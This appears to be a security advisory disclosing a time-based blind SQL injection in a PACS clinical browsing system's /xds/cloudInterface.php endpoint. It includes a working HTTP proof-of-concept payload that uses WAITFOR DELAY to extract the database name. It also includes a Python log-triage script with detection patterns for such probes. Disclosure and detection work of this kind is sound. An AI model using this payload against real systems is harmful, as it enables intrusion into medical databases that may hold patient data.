sql2.md

File metadata and controls

35 lines (32 loc) · 2.24 KB

There is a front-end SQL injection vulnerability in the clinical browsing system of Lanwang Technology Co., Ltd.

  1. Affected product: PACS clinical browsing system
  2. Vulnerability location: /xds/cloudInterface.php
  3. Reproduction of the vulnerability: the login interface is as shown in the figure.

Since the SQL injection here is a time-based blind injection, the database name has to be determined one character at a time by comparing ASCII codes. The PoC is as follows. Here the substring check determines that the first character of the database name is X.

```http
GET /xds/cloudInterface.php?INSTI_CODE=1%27);if%20(ascii(substring(db_name(),1,1)))=88%20WAITFOR%20DELAY%20%270:0:5%27--%20q HTTP/1.1
Host: ip:82
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=9ppbslm6ue630ge9ptrdprb0d2
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 192.168.1.23
```

The same substring check is repeated for each subsequent position: the second character of the database name is D, the third is S, the fourth is 7, the fifth is 0, and the sixth is T. The delayed injection therefore determines that the name of the database is XDS70T.
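For responders, the probes above leave a clear trace in web-server logs: each request carries the `ascii(substring(db_name(),N,1))=V` comparison and a `WAITFOR DELAY`, and the ones that actually slept are the guesses the server confirmed. The following triage script is an added example (not part of the original report) that flags such probes in access-log lines and reconstructs which characters were confirmed; it assumes an nginx combined log with `$request_time` appended as the last field, and the log lines are constructed.

```python
import re
from urllib.parse import unquote_plus

# Constructed nginx-style access-log lines (not from the original report): the
# combined format with $request_time appended as the final field (assumption).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Mar/2024:10:00:01 +0800] "GET /xds/cloudInterface.php?INSTI_CODE=1%27);if%20(ascii(substring(db_name(),1,1)))=87%20WAITFOR%20DELAY%20%270:0:5%27--%20q HTTP/1.1" 200 512 0.031
10.0.0.5 - - [01/Mar/2024:10:00:02 +0800] "GET /xds/cloudInterface.php?INSTI_CODE=1%27);if%20(ascii(substring(db_name(),1,1)))=88%20WAITFOR%20DELAY%20%270:0:5%27--%20q HTTP/1.1" 200 512 5.043
10.0.0.5 - - [01/Mar/2024:10:00:08 +0800] "GET /xds/cloudInterface.php?INSTI_CODE=1%27);if%20(ascii(substring(db_name(),2,1)))=68%20WAITFOR%20DELAY%20%270:0:5%27--%20q HTTP/1.1" 200 512 5.012
10.0.0.5 - - [01/Mar/2024:10:00:14 +0800] "GET /xds/cloudInterface.php?INSTI_CODE=1 HTTP/1.1" 200 512 0.020
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d+) \d+ ([\d.]+)$')
# The probe shape seen in the PoC: compare one character of db_name() by its
# ASCII code, then sleep (MSSQL WAITFOR DELAY) only if the comparison holds.
PROBE_RE = re.compile(r"ascii\(substring\(db_name\(\)\s*,\s*(\d+)\s*,\s*1\)\)\)?\s*=\s*(\d+)", re.I)
DELAY_RE = re.compile(r"waitfor\s+delay\s+'(\d+):(\d+):(\d+)'", re.I)

def parse_probe(line):
    """Return details of a time-based blind SQLi probe in one log line, else None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    client, _method, url, _status, req_time = m.groups()
    # Decode %27/%20 etc. so the SQL fragment is visible to the patterns below.
    query = unquote_plus(url.split("?", 1)[1]) if "?" in url else ""
    probe, delay = PROBE_RE.search(query), DELAY_RE.search(query)
    if not (probe and delay):
        return None
    h, mnt, s = (int(x) for x in delay.groups())
    return {"client": client, "path": url.split("?", 1)[0],
            "position": int(probe.group(1)), "ascii": int(probe.group(2)),
            "delay_s": h * 3600 + mnt * 60 + s, "request_time": float(req_time)}

def recover_leaked_chars(log_text):
    """Map db_name() positions to the character the server confirmed: a guess
    was confirmed when the request took at least as long as the requested delay."""
    leaked = {}
    for line in log_text.splitlines():
        p = parse_probe(line)
        if p and p["request_time"] >= p["delay_s"]:
            leaked[p["position"]] = chr(p["ascii"])
    return leaked

def leaked_prefix(log_text):
    """Concatenate the confirmed characters in position order."""
    leaked = recover_leaked_chars(log_text)
    return "".join(leaked[i] for i in sorted(leaked))
```

Every line that `parse_probe` accepts is worth alerting on regardless of timing; the timing filter only tells you how far the attacker got, which is what the incident report needs.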